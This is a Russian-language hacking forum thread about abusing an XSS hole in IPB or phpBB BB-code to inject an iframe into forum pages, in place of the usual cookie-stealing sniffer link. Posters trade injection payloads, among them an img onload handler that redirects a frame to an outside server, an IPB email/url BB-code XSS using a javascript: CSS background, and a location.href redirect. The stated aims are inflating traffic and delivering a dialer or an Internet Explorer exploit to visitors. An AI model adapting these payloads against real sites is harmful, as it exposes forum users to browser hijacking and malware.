Форумы iframe вместо ссылки на снифер

Вот возникла идея, а можно ли, изменить XSS BB код того же IPB или PHPBB таким образом, чтобы не куки воровать, а вместо ссылки на снифер браузером открывшего страницу юзера обрабатывался iframe тег, ну и соответственно открывалась страничка в этом ifram'е. Советы и примеры принимаются в любых колличествах )

 

Мде, это уже называется раскрутка, да конечно возможно))) Нужно посидеть подумать может чтонить придумаю!

 

Можно. А какие советы или примеры тебе нужны?

 

Да, было бы неплохо, хотя бы один примерчик )

 

Нет уж. Давай-ка лучше сам спрашивай, а мы поможем (точнее - подскажем, точнее - намекнем).

 

Столкнулся с той же проблемой.
Например срабатывает такое XSS:

Code:

<image src="a.jpg" onload=alert();>

Нужно вставить фрейм, пробовал так:

Code:

<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru"> 

Но чтобы это сработало, нужно, чтобы страница содержала какой нибудь другой фрейм.
Подскажите, пожалуйста, как это еще можно осуществить.

 

диалер чтоли вставить хочешь?))))

 

Ну от банальной накрутки посещений до эксплоита под Ie.

 

не совсем уверен про что ты говоришь, но поробуй прочитать http://antichat.ru/txt/hmail/ про mail.ru, там как раз фрейм

 

код не image а img вроде, насколько я знаю насчет данного способа - мне не нравиться
И вообще, если тебе надо сделать два фрейма, так и сделай их... в одном будет то что тебе надо в другом прежний контент страницы

 

Кароче, следуя логике. XSS уязвимость форума направлена на то, чтобы внедрить в просматриваемую PHP(к примеру) страничку теги таким образом, чтобы браузер смог их правильно интерпретировать. Значит, если возможно внедрение вида: <script>.....</script>, в чем же проблема реализации <iframe>.....</iframe> ....

 

А не легче : <img src="javascript:alert()">

 

ЁМОЁ!!! ))))

Береш сплоит... Находишь строчки кода HTML и меняешь их... На нужные...
Дай сплоит помогу ))))

 

Вот это, если не ошибаюсь XSS для последней или предпоследней версии IPB.

Code:

[e*mail]wj@wj[url=http://www.wj.com`=`][/url].com[/e*mail] ` style=`background:url(javaSCript:alert(/wj/))`

 

Попробуй так... Хотя конечно может и не сработать ))))))
[e*mail][email protected][/e*mail] ` style=`background:url(javascript:document.write(ТУТ НУЖНЫЙ ТЕБЕ КОД))`

 

сильно наврят-ли )) вы че, сами то смотрите,че пишете?))))))
[e*mail][email protected][/e*mail] ` style=`background:url(javascript:document.write(ТУ Т НУЖНЫЙ ТЕБЕ КОД))`
ага... почему ` уже после ББ кода? Не тот код, если я не ошибаюсь!

 

даа, че-то не работает. Блин, надо пытаться, я думаю многим будет полезен результат

 

тэги типа

Code:

<iframe>

и другие в скобках не каждый форум пропустит, надо как то без них. Можно конечно просто сделать переадресацию типа

Code:

javascript:location.href='http://server.ru'

но это не то.

WizART, а что ты имел ввиду по поводу создания фрейма? Как его возможно сделать, когда теги фильтруются?

 

А вы вообще уверены, что сплоит рабочий?

 

А причем здесь сплоит? Вопрос в том как вставить фрейм без тэгов в скобках.